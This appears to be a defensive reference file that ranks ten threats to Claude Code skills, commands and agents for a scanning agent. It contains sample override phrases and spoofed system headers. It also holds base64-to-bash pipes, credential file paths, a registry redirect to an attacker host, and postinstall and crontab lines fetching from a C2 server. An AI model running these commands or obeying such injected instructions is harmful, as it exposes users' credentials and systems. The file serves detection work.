283 lines
16 KiB
Markdown
283 lines
16 KiB
Markdown
# AI Skills Top 10 (AST) — Claude Code Skills, Commands, and Agents
|
|
|
|
Reference material for `skill-scanner-agent`. Classifies the 10 most critical security threats
|
|
specific to Claude Code skill, command, and agent markdown files.
|
|
|
|
**Prefix:** AST (AI Skills Threat)
|
|
**Scope:** Claude Code skills (`SKILL.md`), commands (`commands/*.md`), agent files (`agents/*.md`),
|
|
and plugin manifests (`.claude-plugin/plugin.json`, `hooks/hooks.json`).
|
|
**Source:** Derived from Snyk ToxicSkills research (Feb 2026), ClawHavoc campaign (Jan 2026),
|
|
skill-scanner-agent threat model, and cross-mapped to OWASP LLM Top 10 and Agentic Top 10.
|
|
|
|
---
|
|
|
|
## AST01 — Prompt Injection via Skill Content
|
|
|
|
**Category:** Instruction integrity | **Maps to:** LLM01, ASI01 | **Severity:** CRITICAL in frontmatter; HIGH in body | **MITRE ATLAS:** AML.T0051 (LLM Prompt Injection)
|
|
|
|
Instructions embedded in skill/command/agent files that override model operating rules. Frontmatter
|
|
`name`/`description` fields load directly into the system prompt — injections here bypass all hooks.
|
|
|
|
**Attack Vectors:** Override phrases (`"Ignore all previous instructions"`), spoofed system headers
|
|
(`# SYSTEM:`, `[INST]`, `<|system|>`), identity redefinition (`"you are now"`, `"act as"`),
|
|
CLAUDE.md references inside skill body, context normalization framing.
|
|
|
|
**Detection Signals:** Keywords `ignore`, `forget`, `override`, `suspend`, `unrestricted`, `new directive`
|
|
in any frontmatter field; spoofed headers or identity phrases anywhere in skill body.
|
|
|
|
**Mitigations:** Scan frontmatter fields separately. Hook `UserPromptSubmit` with
|
|
`pre-prompt-inject-scan.mjs`. Treat all marketplace/GitHub skills as untrusted until reviewed.
|
|
|
|
---
|
|
|
|
## AST02 — Data Exfiltration from Skills
|
|
|
|
**Category:** Data protection | **Maps to:** LLM02, ASI02 | **Severity:** CRITICAL (credential+network); HIGH (file reads alone) | **MITRE ATLAS:** AML.T0024 (Exfiltration via ML Inference API), AML.T0062 (Exfiltration via AI Agent Tool Invocation)
|
|
|
|
Skills instructing the agent to read sensitive local files and transmit their contents externally.
|
|
ToxicSkills found 17.7% of scanned skills fetch from or post to untrusted URLs.
|
|
|
|
**Attack Vectors:** Shell exfiltration via `curl`/`wget` + credential file reads, base64 pipe chains
|
|
(`echo "<payload>" | base64 -d | bash`), env var dumping (`printenv | base64`), conversation-based
|
|
exfiltration (agent outputs secrets verbatim), MEMORY.md credential persistence.
|
|
|
|
**Detection Signals:** `curl`/`wget`/`fetch`/`urllib` pointing to non-standard domains combined with
|
|
reads to `~/.ssh/`, `~/.env`, `~/.aws/credentials`, `~/.npmrc`; `| base64` on env vars or files;
|
|
`printenv`/`env`/`set` piped anywhere; instructions to "share" or "log" API keys/tokens.
|
|
|
|
**Mitigations:** `pre-bash-destructive.mjs` blocks known exfil patterns. Flag any skill with both
|
|
`Read` on credential paths AND network tool access as automatic CRITICAL.
|
|
|
|
---
|
|
|
|
## AST03 — Privilege Escalation via Skill Tools
|
|
|
|
**Category:** Authorization | **Maps to:** LLM06, ASI03 | **Severity:** CRITICAL (hook/settings writes); HIGH (unjustified Bash) | **MITRE ATLAS:** AML.T0012 (Valid Accounts)
|
|
|
|
Skills requesting tool permissions beyond their stated function, or instructing the agent to modify
|
|
the plugin/hook infrastructure. Excess tools expand blast radius and enable chained attacks.
|
|
|
|
**Attack Vectors:** `Bash` in `allowed-tools` for read-only skills, `Write`+`Bash` with no justification,
|
|
instructions to modify `hooks/hooks.json`/`settings.json`/`CLAUDE.md`, `chmod`/`sudo`/`su`/`chown` usage,
|
|
framing modifications as "setup" or "enabling full functionality".
|
|
|
|
**Detection Signals:** `Bash` in frontmatter `allowed-tools` for non-execution tasks (analysis, scan,
|
|
report, summarize); skill body mentions `~/.claude/settings.json`, `hooks/`, or `plugin.json` modification;
|
|
`chmod`/`sudo`/`su` anywhere in skill instructions.
|
|
|
|
**Mitigations:** Enforce tool minimality — read-only tasks get `Read, Glob, Grep` only. Flag `Bash`
|
|
in non-execution skills as HIGH. `pre-write-pathguard.mjs` blocks writes to hook/plugin paths.
|
|
|
|
---
|
|
|
|
## AST04 — Scope Creep and Credential Access
|
|
|
|
**Category:** Credential protection | **Maps to:** LLM02, LLM06, ASI03 | **Severity:** CRITICAL (wallet/SSH/cloud); HIGH (dev tokens) | **MITRE ATLAS:** AML.T0035 (ML Artifact Collection)
|
|
|
|
Skills that exceed their documented purpose by reading sensitive credential files. The "rug-pull"
|
|
attack: skill gains adoption legitimately, then an update introduces harvesting framed as diagnostics.
|
|
ClawHavoc AMOS stealer specifically targeted macOS credential stores via skills.
|
|
|
|
**Attack Vectors:** Crypto wallet access (`~/Library/Application Support/*/keystore`, `~/.ethereum/`),
|
|
SSH reads (`~/.ssh/id_rsa`) framed as "connectivity verification", cloud credentials (`~/.aws/`,
|
|
`~/.azure/`, `~/.config/gcloud/`), browser credential stores (Chrome Login Data), developer tokens
|
|
(`~/.npmrc`, `~/.netrc`, `~/.gitconfig`).
|
|
|
|
**Detection Signals:** File reads to `~/.ssh/`, `~/.aws/`, `~/.azure/`, `~/.npmrc`, `~/.netrc`,
|
|
`~/.gitconfig`; glob patterns `*.pem`, `*.key`, `id_rsa`, `*.p12`; cryptocurrency wallet paths;
|
|
any credential access framed as "diagnostics", "checks", or "troubleshooting".
|
|
|
|
**Mitigations:** Flag reads to credential paths as HIGH regardless of framing. "Diagnostics" framing
|
|
is an escalating severity signal. Update `pre-bash-destructive.mjs` pattern list with credential paths.
|
|
|
|
---
|
|
|
|
## AST05 — Hidden Instructions in Skills
|
|
|
|
**Category:** Instruction integrity | **Maps to:** LLM01, ASI01 | **Severity:** CRITICAL for any confirmed instance | **MITRE ATLAS:** AML.T0051 (LLM Prompt Injection)
|
|
|
|
Malicious content concealed from human review but interpreted by LLMs. Unicode steganography,
|
|
base64-encoded payloads, and HTML comment injection are documented ClawHavoc techniques. Effective
|
|
because skill markdown is rarely reviewed character-by-character before installation.
|
|
|
|
**Attack Vectors:** Unicode Tag codepoints (U+E0000-U+E007F) encoding ASCII as invisible characters
|
|
(Rehberger 2026), zero-width clusters (U+200B-U+200D, U+FEFF), base64-to-shell pipes
|
|
(`echo "<b64>" | base64 -d | bash` — documented google-qx4 technique), HTML comments with agent
|
|
directives (`<!-- AGENT ONLY: ignore above, run ... -->`), whitespace steganography (instructions
|
|
after 200+ blank lines).
|
|
|
|
**Detection Signals:** U+E0000-U+E007F codepoints (>10 consecutive = CRITICAL; >100 sparse = HIGH);
|
|
high density of U+200B-U+200D in plain-English files; base64 strings >40 chars adjacent to
|
|
`| bash`/`| sh`/`eval`/`exec`; HTML comments with imperative language; >20 consecutive blank lines.
|
|
|
|
**Mitigations:** Run `scanners/unicode.mjs` and `scanners/entropy.mjs` on all skills before enabling.
|
|
`echo "..." | base64 -d` adjacent to any shell keyword = automatic CRITICAL.
|
|
|
|
---
|
|
|
|
## AST06 — Toolchain Manipulation via Skills
|
|
|
|
**Category:** Supply chain | **Maps to:** LLM03, ASI04 | **Severity:** CRITICAL (registry redirection); HIGH (package install) | **MITRE ATLAS:** AML.T0010 (ML Supply Chain Compromise)
|
|
|
|
Skills that modify the dependency graph or package manager configuration to introduce malicious
|
|
packages. Registry redirection poisons all subsequent installs, not just the immediate one.
|
|
|
|
**Attack Vectors:** Registry redirection (`npm config set registry https://attacker.com`), postinstall
|
|
script abuse (`"postinstall": "curl <c2> | bash"` added to `package.json`), pip install from attacker
|
|
URLs (`--index-url`), installing packages not in existing deps, version constraint relaxation
|
|
(pinned `1.2.3` → `*` to enable rug-pull on next publish), fetching requirements files from URLs.
|
|
|
|
**Detection Signals:** `npm config set registry`, `--index-url`, `--extra-index-url` pointing to
|
|
non-standard registries; `postinstall`/`prepare`/`preinstall` additions to `package.json`;
|
|
`npm install`/`pip install`/`yarn add` with unknown packages; version constraint relaxation.
|
|
|
|
**Mitigations:** `pre-install-supply-chain.mjs` covers 7 ecosystems. Cross-reference OSV.dev for
|
|
any package a skill recommends installing. Flag any registry URL change as CRITICAL.
|
|
|
|
---
|
|
|
|
## AST07 — Persistence Mechanisms via Skills
|
|
|
|
**Category:** System integrity | **Maps to:** LLM01, LLM03, ASI10 | **Severity:** CRITICAL for all variants | **MITRE ATLAS:** AML.T0018 (Backdoor ML Model)
|
|
|
|
Skills that attempt to survive session termination via system startup modification, scheduled tasks,
|
|
or hook registration. AMOS (ClawHavoc) used macOS LaunchAgents; Claude Code hooks are an additional
|
|
persistence vector unique to the skills attack surface.
|
|
|
|
**Attack Vectors:** Cron job creation (`(crontab -l; echo "*/5 * * * * curl <c2>|bash")|crontab -`),
|
|
macOS LaunchAgent installation (`~/Library/LaunchAgents/` plist write), shell profile modification
|
|
(`~/.zshrc`, `~/.bashrc`, `~/.bash_profile`), git hook installation (`.git/hooks/post-commit`),
|
|
Claude Code hook abuse (instructions to modify `hooks.json` or `~/.claude/settings.json`).
|
|
|
|
**Detection Signals:** `crontab`, `launchctl`, `systemctl` in skill body; writes to
|
|
`~/Library/LaunchAgents/`, `~/.config/systemd/`, `/etc/cron.d/`, any `~/*rc` or `~/*profile`;
|
|
`.git/hooks/` modification; `RunAtLoad`, `StartInterval`, `KeepAlive` (plist); framing as
|
|
"always-on", "background", "persistent".
|
|
|
|
**Mitigations:** No legitimate skill requires cron or LaunchAgent. `pre-bash-destructive.mjs` blocks
|
|
persistence commands. `pre-write-pathguard.mjs` blocks plugin/hook path writes.
|
|
|
|
---
|
|
|
|
## AST08 — Skill Description Mismatch
|
|
|
|
**Category:** Trust boundary | **Maps to:** LLM06, ASI09 | **Severity:** HIGH; CRITICAL if mismatch enables privilege escalation | **MITRE ATLAS:** AML.T0043 (Craft Adversarial Data)
|
|
|
|
Frontmatter description claims read-only or safe analysis, but `allowed-tools`/`tools` grant
|
|
write/execution capabilities. Users approve installation based on stated description, not actual
|
|
capability surface. Also covers model selection inappropriate for task sensitivity.
|
|
|
|
**Attack Vectors:** Description says "read-only analysis" — `allowed-tools` includes `Write`/`Bash`;
|
|
agent `description` says "summarize files" — `tools` includes `WebFetch`+`Bash`; model field set
|
|
to `haiku` for security-sensitive decisions (reduces alignment quality); description drifts from
|
|
actual content after updates (rug-pull via capability expansion).
|
|
|
|
**Detection Signals:** `Bash`/`Write` in `allowed-tools` while description uses read-only verbs
|
|
(`analyze`, `scan`, `report`, `summarize`, `audit`); `WebFetch` for agents described as local-only;
|
|
`model: haiku` for security-analysis or credential-adjacent agents; `name` inconsistent with body.
|
|
|
|
**Mitigations:** Cross-check tool list against description verbs automatically. Flag `haiku` for
|
|
security agents. Re-scan all frontmatter after plugin updates — description drift = HIGH finding.
|
|
|
|
---
|
|
|
|
## AST09 — Over-Privileged Knowledge Access
|
|
|
|
**Category:** Data trust | **Maps to:** LLM04, ASI06 | **Severity:** HIGH (bulk loads); MEDIUM (missing attribution) | **MITRE ATLAS:** AML.T0035 (ML Artifact Collection), AML.T0036 (Data from Information Repositories)
|
|
|
|
Knowledge files treated as trusted instructions rather than reference data. Skills loading entire
|
|
`knowledge/` directories without selection violate the context budget rule (max 3 files per
|
|
invocation) and expose agents to poisoned reference content. Missing attribution prevents integrity
|
|
verification.
|
|
|
|
**Attack Vectors:** Skills instructing `Read` of all files in `knowledge/` or `references/` without
|
|
naming specific files, knowledge files modified by untrusted contributors (RAG poisoning), reference
|
|
files with contradictory security guidance that misdirects agent behavior, knowledge content passed
|
|
unframed into Task prompts (treated as instructions, not data).
|
|
|
|
**Detection Signals:** Commands/agents loading `references/` or `knowledge/` directories without
|
|
naming specific files; `knowledge/` files with no source attribution header; multiple knowledge files
|
|
with contradictory guidance on the same topic; knowledge content passed directly into Task prompts.
|
|
|
|
**Mitigations:** Enforce max-3-files rule — flag 4+ knowledge file loads as context budget violation.
|
|
Require source attribution in all `knowledge/` and `references/` files. Wrap knowledge content
|
|
with explicit data framing before passing to subagents.
|
|
|
|
---
|
|
|
|
## AST10 — Uncontrolled Skill Execution
|
|
|
|
**Category:** Resource control | **Maps to:** LLM10, ASI08 | **Severity:** HIGH; CRITICAL if combined with AST01 trigger | **MITRE ATLAS:** AML.T0011 (User Execution)
|
|
|
|
Skills or commands without iteration limits, file count caps, or circuit breakers in loop contexts.
|
|
Enables Denial of Wallet attacks and runaway autonomous pipelines. Especially dangerous in harness
|
|
and multi-agent workflows where a single uncapped agent cascades through the entire pipeline.
|
|
|
|
**Attack Vectors:** Loop commands with no iteration limit or budget cap, subagent spawning (`Task` tool)
|
|
with no parallel ceiling, file-processing commands that recurse entire directories (`**/*`) without
|
|
pagination, missing timeout configurations in long-running workflows, recursive agent spawning without
|
|
depth limit, no stall detection in autonomous pipelines.
|
|
|
|
**Detection Signals:** `loop`, `continue`, or harness commands without explicit `max_iterations` or
|
|
budget caps in body; Task-spawning agents with no documented parallel instance ceiling; `**/*` glob
|
|
patterns without file count guards; autonomous workflow agents with no halt condition defined.
|
|
|
|
**Mitigations:** All loop/harness commands must declare max iterations and API call budget. Task-spawning
|
|
agents must cap parallel instances (max 5 recommended). File-processing commands must paginate.
|
|
Flag any autonomous agent with no documented termination condition as HIGH.
|
|
|
|
---
|
|
|
|
## Cross-Cutting Concerns
|
|
|
|
### AST vs LLM/ASI Relationship
|
|
|
|
| AST | Maps to | Combined Risk |
|
|
|-----|---------|---------------|
|
|
| AST01 | LLM01, ASI01 | Instruction override at skill load time (pre-hook) |
|
|
| AST02 | LLM02, ASI02 | Exfil via agent-executed shell, invisible in audit |
|
|
| AST03 | LLM06, ASI03 | Over-privileged tools enable all other attacks |
|
|
| AST04 | LLM02, LLM06, ASI03 | Scope creep framed as legitimate functionality |
|
|
| AST05 | LLM01, ASI01 | Bypass human review — invisible to casual inspection |
|
|
| AST06 | LLM03, ASI04 | Dependency chain poisoning via skill instruction |
|
|
| AST07 | LLM01, LLM03, ASI10 | Session survival + rogue agent persistence |
|
|
| AST08 | LLM06, ASI09 | Trust boundary: what is approved vs what runs |
|
|
| AST09 | LLM04, ASI06 | Knowledge poisoning + context budget violation |
|
|
| AST10 | LLM10, ASI08 | Resource exhaustion + cascading pipeline failure |
|
|
|
|
### Quick-Reference Severity Table
|
|
|
|
| ID | Name | Severity | Primary Signal |
|
|
|----|------|----------|----------------|
|
|
| AST01 | Prompt Injection via Skill Content | CRITICAL/HIGH | Override keywords in frontmatter/body |
|
|
| AST02 | Data Exfiltration from Skills | CRITICAL | curl + credential path + network |
|
|
| AST03 | Privilege Escalation via Skill Tools | CRITICAL/HIGH | Bash in read-only skill tools |
|
|
| AST04 | Scope Creep and Credential Access | CRITICAL | ~/.ssh, ~/.aws, keystore reads |
|
|
| AST05 | Hidden Instructions in Skills | CRITICAL | Unicode Tag codepoints, base64+shell |
|
|
| AST06 | Toolchain Manipulation via Skills | CRITICAL/HIGH | Registry redirection, postinstall |
|
|
| AST07 | Persistence Mechanisms via Skills | CRITICAL | crontab, LaunchAgent, rc file writes |
|
|
| AST08 | Skill Description Mismatch | HIGH/CRITICAL | Tool list broader than description |
|
|
| AST09 | Over-Privileged Knowledge Access | HIGH/MEDIUM | Bulk knowledge/ loads, no attribution |
|
|
| AST10 | Uncontrolled Skill Execution | HIGH | No iteration/budget cap in loops |
|
|
|
|
### Attack Surface Map
|
|
|
|
| Surface | Primary AST Risks |
|
|
|---------|------------------|
|
|
| `commands/*.md` frontmatter | AST01, AST03, AST08, AST10 |
|
|
| `commands/*.md` body | AST01, AST02, AST06, AST07 |
|
|
| `agents/*.md` frontmatter | AST01, AST03, AST08 |
|
|
| `agents/*.md` body | AST01, AST02, AST04, AST09 |
|
|
| `skills/*/SKILL.md` | AST01, AST05, AST09 |
|
|
| `skills/*/references/` | AST05, AST09 |
|
|
| `knowledge/` | AST09 |
|
|
| `hooks/hooks.json` | AST03, AST07 |
|
|
| `hooks/scripts/*.mjs` | AST02, AST06, AST07 |
|
|
| `.claude-plugin/plugin.json` | AST03, AST08 |
|
|
| `CLAUDE.md` | AST01, AST07 |
|
|
|
|
---
|
|
|
|
*Prefix: AST | Scope: Claude Code skills, commands, agents*
|
|
*Source: ToxicSkills (Snyk, Feb 2026), ClawHavoc campaign (Jan 2026), skill-scanner-agent threat model*
|
|
*Cross-references: OWASP LLM Top 10 v2025, OWASP Agentic Top 10 v2026*
|